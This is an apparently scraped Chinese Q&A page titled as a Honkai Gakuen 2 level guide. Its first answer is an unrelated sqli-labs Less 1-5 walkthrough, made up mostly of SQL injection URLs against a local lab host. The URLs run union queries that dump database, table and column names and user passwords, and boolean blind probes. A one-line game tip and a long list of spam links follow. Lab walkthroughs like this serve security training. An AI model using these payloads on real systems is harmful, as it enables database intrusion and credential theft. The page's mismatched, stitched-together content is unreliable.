问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

崩坏学园2荒野雪原1-5林间空地通关指南

发布网友 发布时间:2022-04-11 06:36

我来回答

2个回答

懂视网 时间:2022-04-11 10:58

前言:

好久没手注了,被问了手注相关问题,忘的一干二净,抽出时间把手注再回忆一下,把sqli-labs简单过一下吧。

Less-1(GET单引号字符型注入)

#输入单引号后报错
http://192.168.1.115/sqli-labs/Less-1/?id=1%27

技术图片

#确定字段数
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 3%23
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 4%23

技术图片

技术图片

#联合查询查看页面是否有显示位
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,2,3%23

技术图片

#查询数据库名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

技术图片

#查询表名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

技术图片

#爆列
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘ %23

技术图片

#爆值
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23

技术图片

Less-2(GET整型注入)

#查看页面变化
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=1
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=2
#确定数字段
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 3%23
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,2,3
#爆库
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),3
#爆表
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")
#爆列
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘
#爆值
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(username,password),3 from users

Less-3(GET单引号变形字符型注入)

#查看页面报错
http://192.168.1.115/sqli-labs/Less-2/?id=1‘
http://192.168.1.115/sqli-labs/Less-3/?id=1%27)%20%23
#确定数字段
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 3%23
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union%20select%201,2,3%23
#爆库
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
#爆表
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
#爆列
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘%23
#爆值
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(username,password),3 from users%23

技术图片

技术图片

Less-4(GET双引号字符型注入)

http://192.168.1.115/sqli-labs/Less-4/?id=1%22

http://192.168.1.115/sqli-labs/Less-4/?id=1%22)%20%23

查看报错信息,使用双引号、右括号闭合,其余按照联合查询流程即可

技术图片

技术图片

Less-5(基于布尔的盲注)

#判断数据库版本,left(code, 1)表示取code字段从左截取1位
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=4 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5 %23

#判断数据库长度,使用length()判断长度,二分法可提高效率
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())=8 %23

#猜当前数据库名,left(code, 1)表示取code字段从左截取1位,截取至数据库长度即可判断出数据库名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>‘r‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>‘t‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)=‘s‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>‘d‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>‘f‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)=‘e‘ %23
...

#判断表的个数,count()函数是用来统计表中记录的一个函数,返回匹配条件的行数。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(table_name) from information_schema.tables where table_schema=database())>0 %23

#判断表的长度,limit可以被用于强制select语句返回指定的记录数。
// SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 %23

#依次猜表名,substr(string,start,length);string为要截取的字符串;start为截取的起始位置;length为截取长度。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80 %23
...类似

#确定列数
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = ‘users‘)>0 %23

#确定列的长度
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select column_name from information_schema.columns where table_schema=database() and table_name = ‘users‘ limit 0,1)) > 0 %23

#依次猜列名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name = ‘users‘ limit 0,1),1,1))>79 %23

#确定数据
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select username from users limit 0,1),1,1))>79 %23

sqli-labs通关1-5教程

标签:ascii   sele   表示   tab   条件   联合   匹配   column   order by   

热心网友 时间:2022-04-11 08:06

荒野雪原1-5 林间空地,此游戏自上线以来,一直深受玩家喜爱,那么想知道荒野雪原1-5 林间空地的最新攻略及新闻信息么,下面跟着小骨来一起学习关于荒野雪原1-5 林间空地的知识吧,希望各位玩家了解后能够对该游戏有更加深入的理解。

崩坏学园2荒野雪原1-5如何过?想要了解的玩家们,下面就和小编陌离儿一起来查阅崩坏学园2荒野雪原1-5林间空地通关攻略解析。

轻音基友对抗减速雾气。躲好BOSS就好。没什么难度。

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
如果银行拒贷有哪些办法 小天鹅滚筒洗衣机水位多少合适 阴阳师百闻牌攻略大全 百闻牌式神卡组阵容大全 阴阳师百闻牌三大妖狐阵容推荐 妖狐流派怎么搭配?-新手攻略-安族网... 阴阳师百闻牌妖狐快攻阵容 怎么搭配攻略推荐 阴阳师百闻牌妖狐技能攻略 妖狐属性及卡组搭配推荐-新手攻略-安族网... 阴阳师百闻牌妖狐最强卡组 阵容怎么搭配攻略 阴阳师百闻牌妖狐卡组推荐 怎么搭配攻略分享 带鹏字的公司名字大全 鹏字开头公司起名 叶罗丽娃娃玩具店在哪 土豆檽米粉怎样做 招商银行的信用卡怎么办理? 2018年一级消防工程师考试的通过率是多少? 华为蓝牙耳机freebuds 4i为什么链接苹果手机明明简介正常可没声音呢 消防工程师难嘛?怎么备考? 2018年消防工程师备考误区有哪些? 都说消防工程师考试难考,大家怎么看? 2018年消防工程师考试怎么才能不输在起跑线上? 消防工程师考上以后能用吗,值得考一下吗 注册消防工程师考后感 消防工程师为什么那么多人没有通过考试 我考消防工程师第一年打酱油了,还看了第二章,三科考了不到30分,丢死人了有什么好的经验 hp envy-14 v049tx加固态硬盘怎么加 hp270电脑加了固态硬盘后怎样调启动项? 惠普(HP)Pavilion M4-1016TX笔记本能加固态硬盘吗 惠普电脑增加固态硬盘,之前机械放在光驱位。开机一次快一次慢? 惠普Hp probook 4740s 可以加装固态硬盘吗? 惠普(HP)Pavilion M4-1010TX笔记本能加固态硬盘吗? hppro2000mt加装固态硬盘 未来之战英雄指南通关剧情1-5 土豆泥米粉怎么做 梦到在山上庙里,避雨,而后又天晴 昨晚梦到自己和妈妈为了躲雨进入一间庙里,庙里什么都没有地面还很脏,我和妈妈就跪在地上拜,后来有梦到 梦见去山神庙避雨,山神庙被火烧倒搭 梦见发大水逃到寺庙上面避水 梦见下大雨去庙里拜拜 梦见自己像住桥旁边的庙而且下好大雨。庙里进水什么意思啊? 梦见在墓地围墙下避雨 梦见自己躲在庙里 公益广告语与我们的生活息息相关,好的广告语能起到很好的宣传效果,但 ... 求公益广告词 小米5S怎么开启单手操作模式? 小米4单手操作怎么用 MIUI 6单手模式设置 无线网优盘怎么交钱 无线宽带上网用来装上网卡的像U盘一样插在电脑上的东西多少钱? 那种用USB的像U盘一样的无线网卡去哪里买?怎么计费? 请问无线网卡驱动多少钱。就像U盘那个东西插在电脑usb 上的。 有无线网卡天翼,外表像U盘的那种,装里面的卡大概多少钱,一般哪里有买 插在电脑上的类似u盘~插了那个东西就可以连wlan的东西叫什么?大概多少钱一个 办理电信U盘式无线网卡一年要多少钱
懂视IT 51dongshi.com 版权所有
Copyright © 2019-2024